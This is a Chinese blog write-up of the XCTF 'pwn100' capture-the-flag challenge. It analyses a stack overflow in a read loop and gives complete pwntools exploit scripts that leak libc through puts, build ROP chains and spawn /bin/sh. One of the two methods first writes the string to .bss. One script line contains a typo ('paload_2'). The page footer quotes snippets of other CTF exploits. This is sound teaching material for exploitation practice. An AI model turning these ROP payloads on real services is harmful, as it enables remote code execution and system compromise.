XCTF-pwn-pwn100 writeup

最新推荐文章于 2024-07-25 18:08:40 发布
最新推荐文章于 2024-07-25 18:08:40 发布
阅读量1.5k 收藏
点赞数
分类专栏: pwn题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/121915194
版权

XCTF-pwn-pwn100

  1. 查看安全策略,开了NX保护
root@kali:~/ctf/xctf/pwn# checksec 003_pwn_100 
[*] '/root/ctf/xctf/pwn/003_pwn_100'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

  1. 查看可用的字符串和函数

    [0x00400550]> iz
[Strings]
Num Paddr      Vaddr      Len Size Section  Type  String
000 0x00000784 0x00400784   4   5 (.rodata) ascii bye~

[0x00400550]> afl
0x00400550    1 42           entry0
0x00400530    1 6            sym.imp.__libc_start_main
0x00400500    1 6            sym.imp.puts
0x00400510    1 6            sym.imp.setbuf
0x00400520    1 6            sym.imp.read
0x004006b8    1 72           main
0x0040068e    1 42           fcn.0040068e
0x0040063d    4 81           fcn.0040063d
0x00400610    8 141  -> 99   entry.init0
0x004005f0    3 28           entry.fini0
0x00400580    4 41           fcn.00400580
0x00400540    1 6            loc.imp.__gmon_start
0x004004c8    3 26           fcn.004004c8

    没有可以利用的字符串,也没有可以直接利用的system函数

    • puts: 可以用来泄露libc基址
    • read: 分配的内存大小小于读入上限的话会造成栈溢出

  2. 寻找溢出点

    在函数fcn.0040063d中有个危险函数read,但是可以看到这里一次只读一个字符,不存在溢出。

    |      :|   0x0040066e      ba01000000     mov edx, 1
|      :|   0x00400673      4889c6         mov rsi, rax
|      :|   0x00400676      bf00000000     mov edi, 0
|      :|   0x0040067b      e8a0feffff     call sym.imp.read

    但是继续分析发现read是在一个循环中,如下所示:

    |       ,=< 0x0040065f      eb23           jmp 0x400684
|       |   ; CODE XREF from fcn.0040063d @ 0x40068a
|      .--> 0x00400661      8b45fc         mov eax, dword [var_4h]
|      :|   0x00400664      4863d0         movsxd rdx, eax
|      :|   0x00400667      488b45e8       mov rax, qword [var_18h]
|      :|   0x0040066b      4801d0         add rax, rdx
|      :|   0x0040066e      ba01000000     mov edx, 1
|      :|   0x00400673      4889c6         mov rsi, rax
|      :|   0x00400676      bf00000000     mov edi, 0
|      :|   0x0040067b      e8a0feffff     call sym.imp.read
|      :|   0x00400680      8345fc01       add dword [var_4h], 1
|      :|   ; CODE XREF from fcn.0040063d @ 0x40065f
|      :`-> 0x00400684      8b45fc         mov eax, dword [var_4h]
|      :    0x00400687      3b45e4         cmp eax, dword [var_1ch]
|      `==< 0x0040068a      7cd5           jl 0x400661

    Var_1ch的值是函数的参数,传入的是200,也就是一次读入一个字符,然后循环200次后才会跳出。而存储的内存空间也是从上一层传入的参数,共0x40大小,因此这里存在溢出。

  3. Payload

    根据前面的分析这里没有能直接利用的system函数和/bin/sh字符串。因此尝试利用puts泄露libc的方式获取system和/bin/sh字符。

    本题有puts,因此利用puts来泄露地址。puts需要传入一个参数,因此我们需要gadget来给rdi赋值,这里利用radare2的/R命令搜索gadget

    [0x0040063d]> /R pop rdi
  0x00400763                 5f  pop rdi
  0x00400764                 c3  ret

    于是构造泄露libc基址的payload如下

    payload_1 = b'a' * (0x40 + 0x8)
payload_1 += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload_1 += p64(main)	# 获取基址后返回main再次
payload_1 = payload_1.ljust(200, b'a') # 补全到200个字符跳出循环

    获取libc地址后利用LibcSearcher获取system和/bin/sh,并再次利用溢出点获取shell

    from LibcSearcher import *
...
libc = LibcSearcher('puts', puts_addr)

system = libc + libc.dump('system')
binsh = libc + libc.dump('str_bin_sh')

payload_2 = b'a' * (0x40 + 0x8)
payload_2 += p64(pop_rdi) + p64(binsh) + p64(system)
payload_2 = paload_2.ljust(200, b'a')

  4. 解法2 - 将/bin/sh写入bss段

    问题 - 为什么是bss段而不是其他段?

    首先.bss段是可读写的,这是选择bss段的基础。其次bss段中的实际上是没有内容的,修改其中的内容,并不会导致程序崩溃。

    利用radare或gdb查看bss地址

    [0x0040063d]> iS
[Sections]
Nm Paddr       Size Vaddr      Memsz Perms Name
00 0x00000000     0 0x00000000     0 ---- 
...
25 0x00001050     0 0x00601050    24 -rw- .bss
...

    要把/bin/sh写入到bss中需要用到程序中自带的函数fcn.0040063d, fcn.0040063d()有三个参数,第一个参数是读取内容的存储地址,第二个参数是读取的长度.

    这里没有pop psi; ret这样的gadget,但是有pop psi; pop r15; ret这个gadget,用这个也一样,只不过要给r15随便赋一个值。

    payload_2 = b'a' * (0x40 +0x8)
payload_2 += p64(pop_rdi) +  p64(bss_binsh)
payload_2 += p64(pop_rsi_r15) + p64(7) + p64(0) 
payload_2 += p64(0x0040063d) + p64(main)
payload_2 = payload_2.ljust(200, b'a')

    后面获取shell的payload和解法1类似,这里不再赘述

  5. exp

    解法1

    from pwn import *
from LibcSearcher import *

conn = remote('', )

elf = ELF('./pwn100')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x00400763
main = 0x004006b8

payload_1 = b'a' * (0x40 + 0x8)
payload_1 += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload_1 += p64(main)	# 获取基址后返回main
payload_1 = payload_1.ljust(200, b'a')

conn.send(payload_1)
conn.recvuntil(b'bye~\n')
puts_addr = u64(conn.recv(8).split(b'\n')[0].ljust(8, b'\x00'))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload_2 = b'a' * (0x40 + 0x8)
payload_2 += p64(pop_rdi) + p64(binsh) + p64(system)
payload_2 = paload_2.ljust(200, b'a')

conn.sendline(payload_2)
conn.interactive()

    解法2

    from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

conn = remote('', )

elf = ELF('./pwn100')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x00400763
pop_rsi_r15 = 0x00400761
main = 0x004006b8
# 获取libc
payload_1 = b'a' * (0x40 + 0x8)
payload_1 += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload_1 += p64(main)	# 获取基址后返回main
payload_1 = payload_1.ljust(200, b'a')

conn.send(payload_1)
conn.recvuntil(b'bye~\n')
puts_addr = u64(conn.recv(8).split(b'\n')[0].ljust(8, b'\x00'))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')

# 写入/bin/sh到bss段
bss_binsh = 0x00601060
payload_2 = b'a' * (0x40 +0x8)
payload_2 += p64(pop_rdi) +  p64(bss_binsh)
payload_2 += p64(pop_rsi_r15) + p64(7) + p64(0) 
payload_2 += p64(0x0040063d) + p64(main)
payload_2 = payload_2.ljust(200, b'a')
conn.send(payload_2)
conn.send(b'/bin/sh')
conn.recvuntil(b'bye~\n')

# 获取shell
payload_3 = b'a' * (0x40 + 0x8)
payload_3 += p64(pop_rdi) + p64(bss_binsh) + p64(system)
payload_3 = payload_3.ljust(200, b'a')

conn.send(payload_3)
conn.interactive()

    问题 - 为什么bss段中有些地址可以写入,有些地址不可以呢?

    比如0x00601060可以成功获取shell,但是0x00601050就不可以

Morphy_Amo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
【XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
gdb 查看全局变量字符数组 (编译时不带-g)
guoguangwu的专栏
08-18 813
#include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> char g_file_name[100] = "this is a test"; char * g_str_ptr = "this is a test"; int main() { char file_name[100] = "stat_test.c"; struct stat s.
GDB调试之段信息
luoganttcc的博客
09-16 885
为了更好的调试程序,需要对程序编译后产生的库或可执行程序有一定的了解,本文主要介绍一下其中的段信息。
攻防世界新手区pwn
ca1m4n的博客
11-03 689
攻防世界新手pwnget_shellexp get_shell 首先checksec一下 64位 只开启了栈可执行保护 ida打开 看主函数,好大一个system(/bin/sh) 然后puts和binsh地址差就是偏移量 exp rom pwn import * m=remote('220.249.52.133',xxxxx) binsh = 0x400574 payload='a'*(0x3a-0x18) +p64(binsh) m.sendline(payload) m.interactive()
基于pwntools编写pwn代码
Yale的博客
12-26 1422
0x01 Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mip...
[Black Watch 入群题]PWN(栈迁移到bss)
qq_33590156的博客
08-04 709
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote('node3.buuoj.cn',25353) #ms = process("./spwn") elf = ELF('./spwn') bss_addr = 0x0804A300 lea_ret = 0x08048408 write_plt = elf.plt['write'] write_
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 441
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1089
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 323
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 697
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1148
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 606
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
Leiditech_的博客
07-24 909
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用中通常并接在电路中,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路中的电流和电压突变,产生浪涌。
S-HTTP协议:确保网络通信安全的重要基石
jiamisoft的博客
07-23 651
S-HTTP,全称为Secure Hypertext Transfer Protocol,是一种安全的超文本传输协议,最早于1994年提出,并在1995年正式发布。作为HTTP(Hypertext Transfer Protocol)的一个扩展,S-HTTP旨在通过网络通信提供加密和认证机制,确保数据传输过程中的安全性和完整性。每个S-HTTP文件都经过加密处理,或者包含数字验证,甚至两者兼备,这一特性使得S-HTTP成为需要高安全性数据传输场景下的理想选择。
安全与服务的双重奏:探究ISO20000和ISO27001的企业变革力量
最新发布
xinbiao001的博客
07-25 889
ISO20000是一个面向机构的IT服务管理标准,旨在提供建立、实施、运作、监控、评审、维护和改进IT服务管理体系(ITSM)的模型。它主要关注的是IT服务管理的流程和质量,帮助企业建立高效的IT服务支持,确保IT服务与企业业务目标一致,提高信息技术服务和运营效率,控制IT风险及相关的成本。例如,华为技术有限公司就通过实施这两项体系,提高了内部IT信息安全管理规范,改善了员工对信息安全服务的认知,提升了品牌形象,并促进了与客户的关系。成功的关键在于管理层对这一过程的承诺,以及员工对标准和流程的认同和遵循。
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲区大小时,会覆盖到相邻的内存区域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值